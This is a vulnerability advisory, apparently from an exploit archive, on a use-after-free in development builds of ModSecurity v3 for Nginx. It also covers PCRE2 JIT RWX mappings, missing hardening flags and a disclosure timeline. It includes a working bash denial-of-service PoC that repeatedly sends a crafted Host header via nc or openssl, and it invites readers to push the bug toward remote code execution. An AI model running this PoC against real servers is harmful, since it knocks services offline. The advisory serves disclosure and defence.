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ModSecurity WAF 3.0 for Nginx - Denial of Service Vulnerability
/* * 1. Use-After-Free (UAF) */ During one of the engagements my team tested a WAF running in production Nginx + ModSecurity + OWASP Core Rule Set [1][2][3]. In the system logs I found information about the Nginx worker processes being terminated due to memory corruption errors. Through fuzzing and stress testing it was possible to obtain a minimised payload triggering the memory corruption. Further analysis revealed the v3 branch of ModSecurity suffered from an UAF vulnerability. Unfortunately, all I managed to do with it was to cause a poor-man's remote DoS, perhaps others will have more luck exploiting it. Looking forward to read about it. The jaw dropping PoC: -- $ cat > modsecngxdos.sh << EOF #!/bin/bash a="QlpoOTFBWSZTWZB0FmAAAAlfgAAQAQEQAEWAVAom%2f96UIABQxhMTJgJgACKHqYaj" a=\$a"EaYRk2pkZNlJnepN6k2L5PW8zntXMKxo5QpTgThzp3eBFqIXA0G5fxY3iA%2bYUj" a=\$a"8XckU4UJCQdBZg" b="GET / HTTP/1.1\r\nUser-Agent: grabber\r\nHost: \$a\r\n\r\n" if [ -z "\$1" ]; then echo -e "\n \$0 <host> <port> [tls]\n" echo ; exit elif [ ! -z "\$3" ]; then c="openssl s_client -tls1 -no_ign_eof -quiet -connect \$1:\$2" else c="nc \$1 \$2" fi; echo "Ctrl+C to abort..." while true; do d=\$(echo -e \$b | \$c 2>/dev/null) echo -n "!grab!" if [ ! -z "\$d" ]; then echo "Oh crap. Probably \$1 is not vulnerable. Better luck next time!" exit else echo -n "poof!gone" fi done EOF -- The PoC was confirmed to work against the following combo setups: -- ModSecurity v3/119a6fc07482096e8429399dc2d7c0d3f903a7ae CentOS 7.4.1708 libpthread-2.17 [4] ModSecurity v3/5a32b389b49ebd0325a1ba81d7032593f8b9fb18 Fedora 18 libpthread-2.17 ModSecurity v3/5a32b389b49ebd0325a1ba81d7032593f8b9fb18 Ubuntu 14.04 LTS libpthread-2.19 -- GDB: -- # gdb -p `pgrep nginx|tail -n1` /opt/nginx/nginx_vuln (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007f6a07632f4b in std::string::operator+=(char) () from /lib64/libstdc++.so.6 (gdb) bt #0 0x00007f6a07632f4b in std::string::operator+=(char) () from /lib64/libstdc++.so.6 #1 0x00007f6a079807ed in modsecurity::Rule::getFinalVars (this=this@entry=0x26962d0, trans=trans@entry=0x31f6430) at rule.cc:504 #2 0x0007f6a07981972 in modsecurity::Rule::evaluate (this=this@entry=0x26962d0, trans=trans@entry=0x31f6430, ruleMessage=std::shared_ptr (count 1, weak 0) 0x32f5c70) at rule.cc:637 #3 0x00007f6a079744a6 in modsecurity::Rules::evaluate (this=0x2618210, phase=phase@entry=6, transaction=transaction@entry=0x31f6430) at rules.cc:212 #4 0x00007f6a0796210d in modsecurity::Transaction::processLogging (this=0x31f6430) at transaction.cc:1243 #5 0x00007f6a079624b5 in modsecurity::msc_process_logging (transaction=<optimized out>) at transaction.cc:2101 #6 0x00000000004918b8 in ngx_http_modsecurity_log_handler (r=<optimized out>) at /bla/ModSecurity-nginx/src/ngx_http_modsecurity_log.c:72 #7 0x0000000000439690 in ngx_http_log_request (r=r@entry=0x260db60) at src/http/ngx_http_request.c:3109 #8 0x0000000000439806 in ngx_http_free_request (r=r@entry=0x260db60, rc=rc@entry=0) at src/http/ngx_http_request.c:3064 #9 0x00000000004399e3 in ngx_http_close_request (r=r@entry=0x260db60, rc=rc@entry=0) at src/http/ngx_http_request.c:3017 #10 0x000000000043be5d in ngx_http_finalize_connection (r=r@entry=0x260db60) at src/http/ngx_http_request.c:2233 #11 0x000000000043caa9 in ngx_http_finalize_request (r=r@entry=0x260db60, rc=<optimized out>, rc@entry=0) at src/http/ngx_http_request.c:2127 #12 0x000000000044aea6 in ngx_http_upstream_finalize_request (r=r@entry=0x260db60, u=u@entry=0x323c600, rc=rc@entry=0) at src/http/ngx_http_upstream.c:3102 #13 0x000000000044ba90 in ngx_http_upstream_process_request (r=r@entry=0x260db60) at src/http/ngx_http_upstream.c:2721 #14 0x000000000044bb89 in ngx_http_upstream_process_upstream (r=r@entry=0x260db60, u=u@entry=0x323c600) at src/http/ngx_http_upstream.c:2655 #15 0x000000000044d449 in ngx_http_upstream_send_response (u=0x323c600, r=0x260db60) at src/http/ngx_http_upstream.c:2348 #16 0x000000000044d4d6 in ngx_http_upstream_process_header (r=0x260db60, u=0x323c600) at src/http/ngx_http_upstream.c:1644 #17 0x000000000044bc07 in ngx_http_upstream_handler (ev=0x2fcd598) at src/http/ngx_http_upstream.c:935 #18 0x0000000000427bfc in ngx_epoll_process_events (cycle=0x25f4960, timer=<optimized out>, flags=<optimized out>) at src/event/modules/ngx_epoll_module.c:683 #19 0x000000000041eb3e in ngx_process_events_and_timers (cycle=cycle@entry=0x25f4960) at src/event/ngx_event.c:247 #20 0x0000000000425d40 in ngx_worker_process_cycle (cycle=0x25f4960, data=<optimized out>) at src/os/unix/ngx_process_cycle.c:807 #21 0x000000000042449f in ngx_spawn_process (cycle=cycle@entry=0x25f4960, proc=proc@entry=0x425c51 <ngx_worker_process_cycle>, data=data@entry=0x0, name=name@entry=0x4965e6 "worker process", respawn=respawn@entry=-3) at src/os/unix/ngx_process.c:198 #22 0x0000000000424fcd in ngx_start_worker_processes (cycle=cycle@entry=0x25f4960, n=1, type=type@entry=-3) at src/os/unix/ngx_process_cycle.c:362 #23 0x000000000042664c in ngx_master_process_cycle (cycle=cycle@entry=0x25f4960) at src/os/unix/ngx_process_cycle.c:136 #24 0x0000000000408eca in main (argc=<optimized out>, argv=<optimized out>) at src/core/nginx.c:412 -- ASAN: -- ==17348==ERROR: AddressSanitizer: heap-use-after-free on address 0x60700011dce0 at pc 0x7f59f2baf935 bp 0x7ffe23c92e50 sp 0x7ffe23c925f8 READ of size 38 at 0x60700011dce0 thread T0 #0 0x7f59f2baf934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934) #1 0x7f59f21d7b36 in std::char_traits<char>::copy(char*, char const*, unsigned long) /usr/include/c++/5/bits/char_traits.h:290 #2 0x7f59f21d7b36 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_S_copy(char*, char const*, unsigned long) /usr/include/c++/5/bits/basic_string.h:299 #3 0x7f59f21d7b36 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_S_copy_chars(char*, char const*, char const*) /usr/include/c++/5/bits/basic_string.h:346 #4 0x7f59f21d7b36 in void std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_construct<char const*>(char const*, char const*, std::forward_iterator_tag) /usr/include/c++/5/bits/basic_string.tcc:229 #5 0x7f59f21deddc in void std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> ::_M_construct_aux<char*>(char*, char*, std::__false_type) /usr/include/c++/5/bits/basic_string.h:195 #6 0x7f59f21deddc in void std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> ::_M_construct<char*>(char*, char*) /usr/include/c++/5/bits/basic_string.h:214 #7 0x7f59f21deddc in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> ::basic_string(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /usr/include/c++/5/bits/basic_string.h:400 #8 0x7f59f21deddc in modsecurity::Rule::getFinalVars(modsecurity::Transaction*) /bla/src/ModSecurity/src/rule.cc:596 #9 0x7f59f21dfc1c in modsecurity::Rule::evaluate(modsecurity::Transaction*, std::shared_ptr<modsecurity::RuleMessage>) /bla/ModSecurity/src/rule.cc:728 #10 0x7f59f21d2646 in modsecurity::Rules::evaluate(int, modsecurity::Transaction*) /bla/src/ModSecurity/src/rules.cc:219 #11 0x7f59f21bde18 in modsecurity::Transaction::processRequestBody() /bla/src/ModSecurity/src/transaction.cc:803 #12 0x640d64 in ngx_http_modsecurity_pre_access_handler ../ModSecurity-nginx/src/ngx_http_modsecurity_pre_access.c:199 #13 0x4de9e9 in ngx_http_core_generic_phase src/http/ngx_http_core_module.c:873 #14 0x4de818 in ngx_http_core_run_phases src/http/ngx_http_core_module.c:851 #15 0x4de6ce in ngx_http_handler src/http/ngx_http_core_module.c:834 #16 0x505583 in ngx_http_process_request src/http/ngx_http_request.c:1948 #17 0x502382 in ngx_http_process_request_headers src/http/ngx_http_request.c:1375 #18 0x5001d6 in ngx_http_process_request_line src/http/ngx_http_request.c:1048 #19 0x4fe67c in ngx_http_wait_request_handler src/http/ngx_http_request.c:506 #20 0x4c7083 in ngx_epoll_process_events src/event/modules/ngx_epoll_module.c:902 #21 0x4930a9 in ngx_process_events_and_timers src/event/ngx_event.c:242 #22 0x4bea2b in ngx_worker_process_cycle src/os/unix/ngx_process_cycle.c:750 #23 0x4b5756 in ngx_spawn_process src/os/unix/ngx_process.c:199 #24 0x4bdbf2 in ngx_reap_children src/os/unix/ngx_process_cycle.c:622 #25 0x4ba892 in ngx_master_process_cycle src/os/unix/ngx_process_cycle.c:175 #26 0x40e45a in main src/core/nginx.c:382 #27 0x7f59f189b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #28 0x40d4f8 in _start (/usr/sbin/nginx+0x40d4f8) 0x60700011dce0 is located 0 bytes inside of 69-byte region [0x60700011dce0,0x60700011dd25) freed by thread T0 here: #0 0x7f59f2bbcb2a in operator delete(void*) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99b2a) #1 0x7f59f220eca8 in __gnu_cxx::new_allocator<char>::deallocate(char*, unsigned long) /usr/include/c++/5/ext/new_allocator.h:110 #2 0x7f59f220eca8 in std::allocator_traits<std::allocator<char> ::deallocate(std::allocator<char>&, char*, unsigned long) /usr/include/c++/5/bits/alloc_traits.h:517 #3 0x7f59f220eca8 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_destroy(unsigned long) /usr/include/c++/5/bits/basic_string.h:185 #4 0x7f59f220eca8 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_dispose() /usr/include/c++/5/bits/basic_string.h:180 #5 0x7f59f220eca8 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::~basic_string() /usr/include/c++/5/bits/basic_string.h:543 #6 0x7f59f220eca8 in modsecurity::collection::Collection::resolveMultiMatches(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::vector<modsecurity::collection::Variable const*, std::allocator<modsecurity::collection::Variable const*> >*) ../headers/modsecurity/collection/collection.h:102 #7 0x7f59f220eca8 in modsecurity::collection::Collections::resolveMultiMatches(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::vector<modsecurity::collection::Variable const*, std::allocator<modsecurity::collection::Variable const*> >*) collection/collections.cc:270 #8 0x7ffe23c92faf (<unknown module>) previously allocated by thread T0 here: #0 0x7f59f2bbc532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532) #1 0x7f59f048b498 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_mutate(unsigned long, unsigned long, char const*, unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x11f498) -- /* * 2. The RWX memory mappings */ During the analysis I found that Nginx processes are using RWX memory mappings, upon further investigation it was revealed that those mapping were created by PCRE2 code which is heavily used in ModSecurity. The problem is that the PCRE2's JIT compiler (and DGC in general) in order to operate correctly requires RWX mapped memory, and because of this requirement the security of the code that uses PCRE2 can be impacted. This issue has been known for some time (although new to me) [5][6] with others trying to address it in one way or another [7][8][9][10][11] with varied degrees of success. Programmers who use PCRE2 can unknowingly introduce memory mappings with RWX permissions in their programs. This will make the exploitation process easier (e.g bypassing NX/DEP) or possible (i.e. circumventing CFI) for memory corruption vulnerabilities identified in these programs. The PCRE2's function responsible for creating the RWX mapping is defined in src/sljit/sljitExecAllocator.c [12]: 97 static SLJIT_INLINE void* alloc_chunk(sljit_uw size) 98 { 99 void *retval; 100 101 #ifdef MAP_ANON 102 retval = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON, -1, 0); 103 #else 104 if (dev_zero < 0) { 105 if (open_dev_zero()) 106 return NULL; 107 } 108 retval = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE, dev_zero, 0); 109 #endif 110 111 return (retval != MAP_FAILED) ? retval : NULL; 112 } and is called in ModSecurity by pcre_study() function which is defined in src/utils/regex.cc [13]: 41 Regex::Regex(const std::string& pattern_) 42 : pattern(pattern_), 43 m_ovector {0} { 44 const char *errptr = NULL; 45 int erroffset; 46 47 if (pattern.empty() == true) { 48 pattern.assign(".*"); 49 } 50 51 m_pc = pcre_compile(pattern.c_str(), PCRE_DOTALL|PCRE_MULTILINE, 52 &errptr, &erroffset, NULL); 53 54 m_pce = pcre_study(m_pc, pcre_study_opt, &errptr); 55 } ModSecurity is not the only project that uses PCRE2 in this way [14][15][16][17][18]. I have asked authors of the PCRE2 if there are any plans to introduce changes in the current implementation of JIT in that area and received the following reply from Zoltán Herczeg: -- The problem is that OS-es do not provide better options. On-the-fly machine code generation requires writable and executable memory area. Although you can play with flipping the flags (set writable first / switch to executable later), that is unsafe as setting both, and SELinux does not allow even that. You can play with mapping temporary files (that works under SELinux), but that is ugly and unsafe as the other options. Anyway you can enable such allocator by passing -DSLJIT_PROT_EXECUTABLE_ALLOCATOR=1 to CFLAGS when compiling PCRE, and it works as long as the application does not call fork(). There is no notification for fork() under Linux, so it is impossible to tell in the original application that it was forked. Only the forked part get a new process id. On the long run, Linux (posix) should provide an API designed for JIT compilers. It can be safe if the OS does it. (...) I don't think this issue can be solved without help from the OS. The currently available userland methods are inherently insecure. -- The ModSecurity team also found this issue tricky to resolve because JIT provides a huge performance gain while processing regexes. If disabled, the processing performance could become an issue for users. To address the problem the team considered adding a compile time option for enabling/disabling JIT in the same way it was done in v2 branch [19]. /* * 3. Missing compile-time hardening options */ I found that in some distributions, by default during the ModSecurity compilation the hardening options are missing, e.g.: -- # lsb_release -a LSB Version: :core-4.1-amd64:core-4.1-noarch:cxx-4.1-amd64:cxx-4.1-noarch:desktop-4.1-amd64:desktop-4.1-noarch:languages-4.1-amd64:languages-4.1-noarch:printing-4.1-amd64:printing-4.1-noarch Distributor ID: CentOS Description: CentOS Linux release 7.4.1708 (Core) Release: 7.4.1708 Codename: Core # gdb ./libmodsecurity.so.3.0.0 GNU gdb (GDB) Red Hat Enterprise Linux 7.6.1-100.el7_4.1 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : Dynamic Shared Object RELRO : Partial -- The ModSecurity team considered updating the official documentation so it suggests to users that they should set '-fstack-protector-all' and '-D_FORTIFY_SOURCE=2' options at compile time. It was noted that enabling these could have a potential performance penalty. Trustwave would have to further investigate in order to determine what, if any, negative impact this would have. Additionally, Trustwave considered reaching out to a distro package maintainers and suggest them to enable the aforementioned flags for ModSecurity binary packages. /* * 4. Remediation */ - Update ModSecurity v3 to its most recent version. - Contact vendor for more details. /* * 5. Closing word */ Feel free to correct me if you know or think that I'm wrong on anything which has been described here, as it will only assist others. I would appreciate if someone could point me to any prior work (e.g. exploits/advisories/articles/ctf challs) treating about leveraging JIT/DGC to bypass CFI (e.g. Control Flow Guard by MS or RAP by PaX). The analysis of UAF showed that in order to end up with a vulnerable setup a substantial number of requirements needs to be met, which could lead people to presume that finding this kind of issue in the wild is close to zero. However, life showed (yet again) that vulnerable instances running in a production environment actually exist. Perhaps, it is you who will give this UAF a try, analyse it further and exploit it to obtain RCE. It should be more fun and a better learning experience than many artificial CTF challenges. Trustwave has been contacted and after performing an analysis the team came to the conclusion that the UAF affects only a non-release version(s) of ModSecurity. In Trustwave's opinion there is no need to release official information about this bug and notify users. I wonder if we are going to see more cases similar to this one in the near future. A "non-release" code that ends up in the production due to a spreading SecDevOps's culture. Organisations now build and push code insanely fast. Automating 'git clone ...' and pushing the code through all stages up to production is easy, however, somewhere in the whole CI/DI pipeline there should be some mechanism(s) that will perform verification and determine if the code version/release which is going to be used is actually production ready. This, on the other hand, is a story for another time. /* * 6. Timeline: */ 24.01.2018: Initial contact email sent to security () modsecurity org asking about the process of reporting security related issues in ModSecurity. 06.02.2018: No vendor response. Contacting security () modsecurity org, fcosta () trustwave com and vhora () trustwave com with brief information about the defect and asked about the process of reporting security related issues in ModSecurity. 07.02.2018: Vendor provided information about the reporting process and asked for more details. 10.02.2018: Additional information and defect analysis provided to the vendor. 14.02.2018: No vendor response. Request for a status update. 15.02.2018: Vendor informs the analysis is in progress. 16.02.2018: Vendor informs they're not able to reproduce the issue based on the provided information. 16.02.2018: Additional information provided to the vendor. 17.02.2018: Vendor informs they're not able to reproduce the issue based on the provided information. 17.02.2018: Additional information provided to the vendor including an OVA VM image. 22.02.2018: Vendor confirms they were able to reproduce the issue and requests additional information. 22.02.2018: Additional information provided to the vendor. 16.03.2018: No vendor response. Request for a status update and notifying vendor about the planned advisory release. 16.03.2018: Vendor confirms issue doesn't happen on the stable release version, but more specifically on some development versions. 16.03.2018: Vendor concludes the analysis and provides the following response: We had a fix of invalid variable references which were leading to crashes on some scenarios. This was fixed on development commit v3/003a8e8e5f33f4bbbc0e8c349b25faec74bb0440. We also confirmed that the RC1 version (v3/a2427df27f482c64ea8666dca9552c67d3a68904) that came out a few days later is not vulnerable to this issue. The crash happening on Nginx with development commit v3/119a6fc07482096e8429399dc2d7c0d3f903a7ae (the one that we managed to reproduce from your OVA) was due to a test (hence why its named "test-only: Placing a mutex while evaluating the pm operator") and it was changed at the same time with commits v3/7d786b335024f2c896eb30830427c54f28dcc44c and v3/1c91e807778f826b20d45abcef9a204e8f313d01 which followed the first one with a few seconds of difference (see git log). They came from a different branch and were merged together so in essence they are all part of the same code change. As those issues didn't happened on any of the release versions (v3.0.0-rc1/v3.0.1) and we confirmed that the issue is fixed since commit v3/1c91e807778f826b20d45abcef9a204e8f313d01 we believe that a notice on a bug from a development version is not really necessary at this moment. We are open to hear your thoughts otherwise. 20.03.2018: Advisory draft sent to the vendor for review along with information about the planned release on 22.03.2018. 23.03.2018: The advisory is released. /* * 7 Acknowledgments */ - Victor Hora (Trustwave) - Gregory Nimmo and Alex Dib (Telstra) - Telstra BTS Security Services (redteamnsw () team telstra com) /* * 8. References */ [1] https://nginx.org/download/nginx-1.13.8.tar.gz [2] https://github.com/SpiderLabs/ModSecurity [3] https://github.com/SpiderLabs/owasp-modsecurity-crs [4] https://bugzilla.redhat.com/show_bug.cgi?id=1146967 [5] https://en.wikipedia.org/wiki/Just-in-time_compilation#Security [6] https://en.wikipedia.org/wiki/JIT_spraying [7] https://pax.grsecurity.net/docs/mprotect.txt [8] https://undeadly.org/cgi?action=article&sid=20160527203200 [9] https://www.tedunangst.com/flak/post/now-or-never-exec [10] https://jandemooij.nl/blog/2015/12/29/wx-jit-code-enabled-in-firefox/ [11] http://wenke.gtisc.gatech.edu/papers/sdcg.pdf [12] https://vcs.pcre.org/pcre2/code/trunk/src/sljit/sljitExecAllocator.c?view=markup#97 [13] https://github.com/SpiderLabs/ModSecurity/blob/v3/master/src/utils/regex.cc#L41 [14] https://git.haproxy.org/?p=haproxy-1.8.git;a=blob;f=src/regex.c;h=62c8e84df9e8b122dad61b44bebd70f885de6711;hb=1deb90d5243a5cfa5da7592978592eb9ab2c8c6f#l358 [15] https://github.com/unbit/uwsgi/blob/master/core/regexp.c#L29 [16] https://github.com/varnishcache/varnish-cache/blob/master/lib/libvarnish/vre.c#L86 [17] https://github.com/nginx/nginx/blob/008e9caa2a5b784d337422f1dc4290edfb9cc640/src/core/ngx_regex.c#L341 [18] https://github.com/php/php-src/blob/PHP-7.1.14/ext/pcre/php_pcre.c#L542 [19] https://github.com/SpiderLabs/ModSecurity/blob/v2/master/configure.ac#L328 # 0day.today [2024-11-14] #